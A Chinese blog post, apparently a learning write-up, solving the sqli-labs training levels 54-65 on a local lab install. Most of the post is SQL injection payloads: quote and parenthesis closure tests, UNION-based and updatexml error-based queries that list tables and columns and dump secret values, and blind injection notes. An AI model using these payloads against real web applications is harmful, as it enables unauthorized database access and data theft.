Yoga7xm's Blog

sqli-lab(54-65)

字数统计: 849阅读时长: 3 min
2018/12/03 Share

0x00 前言

最后一个阶段了,继续干活

0x01 干活

Less-54

这题好像有次数限制,最多只能十次。但是经测试可能是单引号闭合的,于是payload:

http://localhost/sqli/Less-54/?id=1' and 1=1--+

利用:

1.爆库名:

http://localhost/sqli/Less-54/?id=-1' union select 1,2,database()--+

2.爆表名:(challenges )

1
http://localhost/sqli/Less-54/?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x6368616c6c656e676573)--+

3.爆列名:(qzwhq5oriy )

1
http://localhost/sqli/Less-54/?id=-1' union select 1,2,(SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x717a776871356f726979)--+

4.爆数据:

1
http://localhost/sqli/Less-54/?id=-1' union select 1,2,(SELECT+GROUP_CONCAT(sessid,0x3a,secret_XXB8+SEPARATOR+0x3c62723e)+FROM+challenges.qzwhq5oriy)--+

回显db24b263eea4a88462e36e5785715584:URkF4dF3X0PsKdSZR67TKWbQ

Less-55

尝试了好几次后,利用括号成功闭合了,payload:

http://localhost/sqli/Less-55/?id=1) and 1=1--+

而且是报错型的,利用方式可以跟上面一样。

Less-56

与上面一样,只要括号+引号闭合即可。payload:

http://localhost/sqli/Less-56/?id=1') and 1=1--+

同样是报错型的,利用方式可以跟上面一样。

Less-57

与上面一样,只是双引号闭合即可。payload:

http://localhost/sqli/Less-57/?id=1" and 1=1--+

同样是报错型的,常规操作,利用方式可以跟上面一样。

Less-58

与上面一样,只利用了单引号闭合。payload:

http://localhost/sqli/Less-58/?id=1' and 1=1--+

1.爆库:

1
http://localhost/sqli/Less-58/?id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

回显XPATH syntax error: '~challenges~'

2.爆表:

1
http://localhost/sqli/Less-58/?id=1'  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA='challenges'),0x7e),1)--+

回显XPATH syntax error: '~5ss6gttnz1~

3.爆列名:

1
http://localhost/sqli/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_name='5ss6gttnz1'),0x7e),1)--+

回显XPATH syntax error: '~id,sessid,secret_2M3X,tryy~'

4.爆数据:

1
http://localhost/sqli/Less-58/?id=1' and updatexml(1,concat(0x7e,(select secret_2M3X from 5ss6gttnz1),0x7e),1)--+

回显:XPATH syntax error: '~VAVJzFouSyjZX3ckJiJRNf95~'

Less-59

跟往题一样,没有用其他符合进行闭合。于是,payload:

http://localhost/sqli/Less-59/?id=1 and 1=1--+

后面就是常规套路了。

Less-60

这里利用了双引号+括号的闭合方式。于是,payload:

http://localhost/sqli/Less-60/?id=1") and 1=1-+

后面就是常规套路了。

Less-61

测试过程中,得到回显near ''1'')) LIMIT 0,1' at line 1发现是单引号+双括号进行闭合。于是,payload:

http://localhost/sqli/Less-61/?id=1')) and 1=1--+

后面就是常规套路了。

Less-62

这里跟其他的不大一样的是,这题是单引号+括号的布尔型盲注。没有回显,payload:

http://localhost/sqli/Less-62/?id=1') and 1=1--+

利用方式跟之前盲注类似。

Less-63

与上一题一样,只是用来单引号进行闭合的盲注。payload:

http://localhost/sqli/Less-63/?id=1' and 1=1--+

利用方式跟之前盲注类似。

Less-64

闭合方式不一样,为双括号闭合。payload:

http://localhost/sqli/Less-64/?id=1)) and 1=1--+

利用方式跟之前盲注类似。

Less-65

闭合方式不一样,为双引号+括号进行闭合的。payload:

http://localhost/sqli/Less-65/?id=1") and 1=1--+

利用方式跟之前盲注类似。


0x02 后记

为期好几天的SQL天书也终于完结了,学到了不少东西。虽然题目比较多,但是大部分比较基础,对SQL注入的理解有很大的帮助。

CATALOG
  1. 1. 0x00 前言
  2. 2. 0x01 干活
    1. 2.1. Less-54
    2. 2.2. Less-55
    3. 2.3. Less-56
    4. 2.4. Less-57
    5. 2.5. Less-58
    6. 2.6. Less-59
    7. 2.7. Less-60
    8. 2.8. Less-61
    9. 2.9. Less-62
    10. 2.10. Less-63
    11. 2.11. Less-64
    12. 2.12. Less-65
  3. 3. 0x02 后记